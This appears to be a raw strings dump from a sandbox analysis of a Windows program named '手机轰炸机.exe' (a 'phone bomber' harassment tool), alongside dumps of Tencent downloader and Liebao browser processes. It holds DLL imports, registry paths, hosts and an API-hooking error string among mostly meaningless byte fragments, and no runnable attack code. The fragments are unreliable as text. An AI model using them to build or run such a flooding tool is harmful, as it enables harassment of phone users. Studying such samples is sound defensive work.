^|W%F
.MkT'E&M^r
%Ch<
AÄW
d}.Of
\A%C|O
%C$8
A_tHc%C C
AÀ,
I.aPX
(].wL
].LwE
yV%C '
%f/xyV
.YL A&6Q
<%Chi
/`U&M^%C$
.MNl3
aJBm_dX Ajb%7x
Uh<y%d>
Wu:R}
G.aTo
h'%Cl_}"
6o<%Cx
%C|P3)JQ
ðN)R
t a:R}
IW%Cl`;
À&D
f!.LwD
Xh&& %f
.IUs8
Sq.Ge
|/DXPK%u
.Mk0{
y:%C$7
kQ;5dHf}<
J.LwE"#Az~
%C$P5f
9rDb%F
.Ge*b]@
SxT7þcXE
%Ch8V
?|u.oJ
j@V:Xc%Cx=
WO %S
q.uf}
|G.Lc
XÄ(o
Wu.oM
W%Src
.Lw]B5.
W%Chc
u.eri[
%f/|u
B`7%FO(
.YL/v!t7^
SHELL32.dll
WINMM.dll
.cIrb
_`.ub
b:\0,
.LRC\
.CXbt\Y
.qnaS>
^`g%FP
w.Nj\
JUdPa
V$F%x
;%DO\
\z.ay
wg.tq
\i-L}
|B\%f
.Qh\S
.AsD<
)\l.zc
F:\BQw
C\ .lE
cm.Ng\
%F:Y\Q
'\.mtl
{\.Bf
a.CiN
(.oTv
Q:P\.eC7
.vc3S
CmDk
.tjuN"\
.XQ\x
.kN)C$8_<
%C$8_
e>oole32.dll
g %Ch
%f{T(
WININET.dll
KERNEL32.dll
.aoT3
%F'Y<
*t%C$I
g.ePkr9
%f{<i6>
t_-N×
WINSPOOL.DRV
@3}.Lg0
K!f%C|Om
comdlg32.dll
.IFk,k
p%f{ \;HYwL
RASAPI32.dll
%CxT7%
SD.GH
\a.wT
.xCa\
_r%Uy
9p
\f7q$ %sJaz;m0
zX.qa
a.YfJuSL
Z,.YXz=a
8.BBi\
p%s.a
%u$<n>
%uhOK
.UPAXM
~#]|%X
-<O%c>
y4\p%s"
.RlJSp
!Xl%s*
.VnZ
%s2ba
Jc\>%d
s%.mm
%F"_T
.XugE
^z }|x%SnS;p
\.Al(]
%CsH]^
3.pu*
#].as
;.WMx
.dMs4
.CG}B`
%s&l}L
M.Id)
TUm%f
s:\-B
FR"\.Ap
D;%sb
D/%Xk
p%s^2u.i
W\.Xe
%d`U?
k.MF _A
.kOW\
|%s*/
'q.zQ
y.RO0
:^.gNk*T
#%f&;!
%4U#o<\k^
.Xe\ Ud
ö<}
S1.Dh
V.wu#
(.aS[i
.hv8w
.xgPD
.Uut [
c:\Ed
<a%2>
%uP{\Y<
N%S Pa)$
o%D:&\
.HefG
-G2}gfd
-6}_$C,D
\%xSj
.gU\!
X.SIct
deX.do
*'c%D
S.Fx<
G:\1@
X-%f#6
OLEAUT32.dll
ADVAPI32.dll
U6%C$8
l$B%f
%f{T(w
Wu.Ge
{[.nv
>E6%CxT
L{>%X
z;h7.hxn
X)%C_
R].MP
,/%DV4
^.DTV[
%C#`;
F^>.xLng
%c`T80
r%u=EB;'
|.Imy
^@%xS
%fy6j
H.ST?f^@
.GwYo!
]w.iG
;.aVR
jD..tb
zY.vh
.yv}{"
RegOpenKeyExA
^|W6%xk
wiphlpapi.dll
WS2_32.dll
LsI.Or
@a%dG
zD.BOO
.yxW%v
Sq6%C
1, 0, 6, 6
-Skin.dll
mscoree.dll
Error at initialization of bundled DLL: %s
Error at hooking API "%S"
Dumping first %d bytes:
1.3.2012.11
手机轰炸机.exe_652_rwx_005E5000_000EC000:
2.Lsm
Please contact the application's support team for more information.
- Attempt to initialize the CRT more than once.
- CRT not initialized
- floating point support not loaded
GetProcessWindowStation
USER32.DLL
operator
activation.php?code=
deactivation.php?hash=
.?AVIUrlBuilderSource@@
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\
.AnRH
.MCa:
T!n%d
1fÄ
$z%D?
\c%C|
À=p
%C$8O
tm.Uf
.iZPa
.sWu&6i*
4.LwE
e.KiV%
h7.Lc
^|#%C
%ChO4s1'TdR>
*Hc%Cl
Zx7EzR%X
w0e.edZZ
}f}U
6qp7%f
i].Kd
.IRp/-K
XcYfV%7x
À,c
%C$O`i
`.Lsx
]>.MN
cLj%C
~U`/]>.av
t/]vF}
3:4R%Sq
.Ca6&E(
n=.LgmR
Sq.Ge>N-(F
hcRT
A%CxS
.LwL.
cc.fW;
FÀ,g
T7%F->R
%FPn9
%C u^
4.LcY
.Pq{N
.Ca6&
%C$I-
^|W%F
.MkT'E&M^r
%Ch<
AÄW
d}.Of
\A%C|O
%C$8
A_tHc%C C
AÀ,
I.aPX
(].wL
].LwE
yV%C '
%f/xyV
.YL A&6Q
<%Chi
/`U&M^%C$
.MNl3
aJBm_dX Ajb%7x
Uh<y%d>
Wu:R}
G.aTo
h'%Cl_}"
6o<%Cx
%C|P3)JQ
ðN)R
t a:R}
IW%Cl`;
À&D
f!.LwD
Xh&& %f
.IUs8
Sq.Ge
|/DXPK%u
.Mk0{
y:%C$7
kQ;5dHf}<
J.LwE"#Az~
%C$P5f
9rDb%F
.Ge*b]@
SxT7þcXE
%Ch8V
?|u.oJ
j@V:Xc%Cx=
WO %S
q.uf}
|G.Lc
XÄ(o
Wu.oM
W%Src
.Lw]B5.
W%Chc
KERNEL32.DLL
mscoree.dll
Error at initialization of bundled DLL: %s
Error at hooking API "%S"
Dumping first %d bytes:
手机轰炸机.exe_652_rwx_00738000_00001000:
%F'Y<
*t%C$I
g.ePkr9
tencentdl.exe_1932:
.text
`.rdata
@.data
.rsrc
8%uvP
;*u.SUj
PSSSSSSh
>.uTV
j SSSSSSSh
aSSSh
FTPjK
FtPj;
C.PjRV
tGHt.Ht&
YYtCP
t.hXOK
asio.ssl
asio.misc
D:\Boost\boost_1_44_0\include\boost-1_44\boost/exception/detail/exception_ptr.hpp
asio.misc error
asio.ssl error
fs_report.qq.com
fs_h2u.qq.com
fs_conn.qq.com
fs_hello.qq.com
xuanfengnet.qq.com
stun.qq.com
fs_tcp_conn.qq.com
pdlxf.qq.com
thread.exit_event
thread.entry_event
%s\Connection
System\CurrentControlSet\Control\Network\{4D36E972-E325-11CE-BFC1-08002BE10318}
www.tencent.com.
HTTP/1.1
$MD5Version: 1.0.0 November-19-1997 $
$Id: md5.c,v 1.1.1.1 2004/05/17 13:23:36 rcrittenden0569 Exp $
/tencentdlinstallinfo/dtrp?v=1&&format=json&&product=tencentdlinstallinfo&&cmd=1
dtrp.tencentdlinstallinfo.qq.com
<!--%s-->
standalone="%s"
encoding="%s"
version="%s"
&#xX;
%s='%s'
%s="%s"
PKEY_CUSTOMNAME
PKEY_PRODUCTNAME
PKEY_ISSHOW
PKEY_EXITTIME
PKEY_CUSTOMID
PKEY_START_STATUS
PKEY_GUID
PKEY_MINORVERSION
PKEY_MAJORVERSION
PKEY_COREVERSION
PKEY_EXEVERSION
PKEY_UPDATESERVERPORT
PKEY_UPDATESERVERIP
PKEY_EXHASH
PKEY_EXNAME
PKEY_TNHASH
PKEY_TNNAME
PKEY_COREHASH
PKEY_CORENAME
PKEY_EXEHASH
PKEY_EXENAME
PKEY_UPDATEURL
PKEY_FILENAME
PKEY_RESULT
xf_com_update_doctor.qq.com
PKEY_TTL
PKEY_ISFIX
PKEY_VERSION
PKEY_FILEEMULE_HASH
PKEY_FILEEMULE_SIZE
PKEY_FILEEMULE_NAME
PKEY_FILEBT_HASH
PKEY_FILEBT_SIZE
PKEY_FILEBT_NAME
PKEY_FILECORE_HASH
PKEY_FILECORE_SIZE
PKEY_FILECORE_NAME
PKEY_URL
PKEY_PERIOD
kernel32.dll
.mixcrt
KERNEL32.DLL
Please contact the application's support team for more information.
- Attempt to initialize the CRT more than once.
- CRT not initialized
- floating point support not loaded
mscoree.dll
GetProcessWindowStation
USER32.DLL
operator
portuguese-brazilian
FhModule = %u, pfunc = %u
DbgHelp.dll
crash.dmp
0xX
DlBugReport.ini
DlBugReport.dat
%Y-%m-%d %H:%M:%S
%d.%d.%d.%d
,d-d-d d:d:d
[ 0xX ] %s [%s]
Error: Write address 0xX
Error: Read address 0xX
version = %s
%s-----------------------------------
Type: %s
Address: 0xX
QQDownload.exe
EXCEPTION_FLT_INVALID_OPERATION
EXCEPTION_FLT_DENORMAL_OPERAND
(%d,%d,%d,%d)
0xX<unknown module>:
%s::x;
0xX[%X] %s:
%s::x
Local\{C15730E2-145C-4c5e-B005-3BC753F42475}-once-flag
Visual C CRT: Not enough memory to complete call to strerror.
Broken pipe
Inappropriate I/O control operation
Operation not permitted
c:\downloadplugin\tencentdl_v122\output\release\Tencentdl.pdb
HttpQueryInfoW
HttpEndRequestW
HttpSendRequestExW
HttpAddRequestHeadersW
HttpOpenRequestW
WININET.dll
GetProcessHeap
CreateIoCompletionPort
GetCPInfo
GetConsoleOutputCP
KERNEL32.dll
USER32.dll
GDI32.dll
RegDeleteKeyW
RegCloseKey
RegCreateKeyExW
RegOpenKeyExW
RegQueryInfoKeyW
RegEnumKeyExW
RegOpenKeyW
RegOpenKeyExA
ADVAPI32.dll
ShellExecuteW
SHELL32.dll
ole32.dll
OLEAUT32.dll
SHLWAPI.dll
COMCTL32.dll
WS2_32.dll
VERSION.dll
NetWkstaTransportEnum
NETAPI32.dll
PSAPI.DLL
imagehlp.dll
zcÁ
'DownloadProxy.EXE'
DownloadProxy.Downloader.1 = s 'Downloader Class'
CLSID = s '{70DE12EA-79F4-46bc-9812-86DB50A2FD64}'
DownloadProxy.Downloader = s 'Downloader Class'
CurVer = s 'DownloadProxy.Downloader.1'
ForceRemove {70DE12EA-79F4-46bc-9812-86DB50A2FD64} = s 'Downloader Class'
ProgID = s 'DownloadProxy.Downloader.1'
VersionIndependentProgID = s 'DownloadProxy.Downloader'
'TypeLib' = s '{DA624F8F-98BF-4B03-AD11-A12D07119E81}'
stdole2.tlbWWW
cuiMsgTypeWWW
pMsgParamWWWd
6|pTaskUrl
Created by MIDL version 6.00.0366 at Thu Oct 11 11:26:38 2012
&UU*&&&&&&&&*UU(%%%%%%%%(UU)%%%%%%%%)UU.$$$$$$$$.UU1''''''''1UU
"7,,11,,7"
2222222222222222
11///20.
##!!! !!!##
.02///11
mM............................................................Mm
mM..........................................Mm
(((((((JgT..TgJ(((((((
$D>".PH'8xU
<assemblyIdentity type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" processorArchitecture="x86" publicKeyToken="6595b64144ccf1df" language="*"/>
HKEY_CLASSES_ROOT
HKEY_CURRENT_USER
HKEY_LOCAL_MACHINE
HKEY_USERS
HKEY_PERFORMANCE_DATA
HKEY_DYN_DATA
HKEY_CURRENT_CONFIG
TNProxy.dll
qqdownload_config.xml
dlcore.dll
\tencentdl.exe
{51BEE30D-EEC8-4BA3-930B-298B8E759EB1}
CLSID\%s\LocalServer32
{%X-%X-%X-%X-%X%X}
B.tlb
Mscoree.dll
DownloadProxy.Downloader.1
\Tencentdl.exe
\Installlog.txt
\DownloadProxyPS.dll
\extract.dll
\tnproxy.dll
\dlcore.dll
regsvr32.exe
Kernel32.dll
Extract.dll
C\StringFileInfo\xx\
netsh.exe
\\.\PhysicalDrive%d
\\.\Scsi%d:
oiphlpapi.dll
nM-%.2d-%.2d %.2d:%.2d:%.2d
Unknown ProcessID. PID = %d
No pid option found in CmdLine
Content-Length: %d
Content-Type: application/x-www-form-urlencoded
\downloadproxyps.dll
oInstallInfo.xml
\Global.db
PQD_Temp_Exe
%*.*f
Tencentdl.exe
: %s/s
%s: %s
\TDConfig.ini
H\set.log
c:\program files\common files\tencent\qqdownload\122\tencentdl.exe
(1-10240)
1, 0, 122, 3
手机轰炸机.exe_652_rwx_10028000_00015000:
msctls_hotkey32
TVCLHotKey
THotKey
\skinh.she
}uo,x6l5k%x-l h
9p%s m)t4`#b
e"m?c&y1`Ð<
SetViewportOrgEx
SetViewportExtEx
SetWindowsHookExA
UnhookWindowsHookEx
EnumThreadWindows
EnumChildWindows
`c%US.4/
!#$<#$#=
.text
`.rdata
@.data
.rsrc
@.UPX0
`.UPX1
`.reloc
hJK.ZH
O.qt0
KNBCenter.exe_1240:
.text
`.rdata
@.data
.rsrc
@.reloc
D$@j.Xf
j.Yf;
_tcPVj@
.PjRW
user.js
ERROR_REPORT
PlatformFile.UnknownErrors.Windows
Histogram: %s recorded %d samples
(flags = 0x%x)
(%d = %3.1f%%)
CHROME_PROFILER_TIME
Unsupported encoding. JSON must be UTF-8.
Dictionary keys must be quoted.
full-memory-crash-report
USER32.dll
SHELL32.dll
ole32.dll
function not supported
operation canceled
address_family_not_supported
operation_in_progress
operation_not_supported
protocol_not_supported
operation_would_block
address family not supported
broken pipe
inappropriate io control operation
not supported
operation in progress
operation not permitted
operation not supported
operation would block
protocol not supported
operator
GetProcessWindowStation
liebao.exe
Src\kbsevMain.cpp
RegOpenKeyTransactedW
chrome.dll
breakpad_win_crash_service_knbcenter.cpp
pipe name is
ieframe.dll
hlink.dll
urlmon.dll
wininet.dll
mpr.dll
msls31.dll
oleaut32.dll
xmllite.dll
d2d1.dll
dxgi.dll
dnsapi.dll
d3d9.dll
avrt.dll
mf.dll
mfplat.dll
mfreadwrite.dll
msdmo.dll
authz.dll
msacm32.dll
setupapi.dll
evr.dll
avifil32.dll
wmdrmsdk.dll
\liebao\User Data\liebao.log
4.5.34.6725
report_dump_file
lXXxXXXXXXXX
http://dump.upload.duba.net/DumpFileUploader/duba_dump/__utm.gif
c:\liebao_src_pool\release.branch_34\src\security\tmp\Release\knbcenter\dbginfo\knbcenter.pdb
VERSION.dll
PSAPI.DLL
WaitNamedPipeW
TransactNamedPipe
SetNamedPipeHandleState
ConnectNamedPipe
CreateNamedPipeW
DisconnectNamedPipe
GetWindowsDirectoryW
KERNEL32.dll
RegOpenKeyExW
RegCloseKey
ADVAPI32.dll
SHLWAPI.dll
WTSAPI32.dll
USERENV.dll
WINMM.dll
GetProcessHeap
GetCPInfo
zcÁ
%Program Files%\liebao\4.5.34.6725\KNBCenter.exe
<requestedExecutionLevel level="asInvoker" uiAccess="false" />
;#;'; ;/;3;7; <
1"1&1*1.12161:1
024282<2
; ;@;`;|;
0 0004080<0@0
4 4$40484<4
debug.log
.\debug.log
debug_message.exe
\StringFileInfo\xx\%ls
kernel32.dll
Chrome_MessagePumpWindow_%p
Emscoree.dll
- CRT not initialized
- Attempt to initialize the CRT more than once.
- floating point support not loaded
portuguese-brazilian
USER32.DLL
LIEBAO_EXE_PATH
CHROME_DLL_PATH
KNBCenter.exe
knbctrl.dll
kBrowserUpgrade2.dll
ksapi.dll
Local\LBKSINIT_{DE37097C-AC19-4513-9D64-E2E3D51676AE}
knbcenter.log
rknbpolicy.dll
\kmsgsvc.dll
Advapi32.dll
SYSTEM\CurrentControlSet\Services\%s
%d.%d.%d.%d
FLT_DENORMAL_OPERAND
FLT_INVALID_OPERATION
gcswf32.dll
\liebao\User 
Data\report.ini</pre><pre>report</pre><pre>cmdline</pre><pre>DumpKey</pre><pre>\kdumprep.exe"</pre><pre>https://clients2.google.com/cr/report</pre><pre>1441792</pre><pre>Breakpad/1.0 (Windows)</pre><pre>\\.\pipe\LiebaoCrashServices_SecSvr</pre><pre>dbghelp.dll</pre><pre>rpcrt4.dll</pre><pre>%s\%s.dmp</pre><pre>ddddddd</pre><pre>CLSID\{DA3CB2BC-1CCA-412d-BC7C-4DFB532D2223}\Implemented Categories\{D7BD91AA-CB34-4eae-A9D1-2DB9A7C6815C}</pre><pre>CLSID\{9B7A98EC-7EF9-468c-ACC8-37C793DBD7E0}\Implemented Categories\{A5F7140E-4311-4ef9-AABC-F55941B5EBE5}</pre><pre>x-x-x-xx-xxxxxx</pre><pre>/browser_version "4.5.34.6725"</pre><pre>%s\*.dmp</pre><pre>Data\kxecolbd.dat</pre><pre>%s%d\</pre><pre>Windows</pre><pre>Liebao\Crash Reports</pre><pre>verifier.dll</pre><pre>-full.dmp</pre><pre>knbcenter.dll</pre></pre></pre></pre></pre></y%d></pre></pre></pre></pre></a%2></pre></O%c></pre></n></pre></i6></pre></pre></pre></pre></pre></y%d></pre></pre>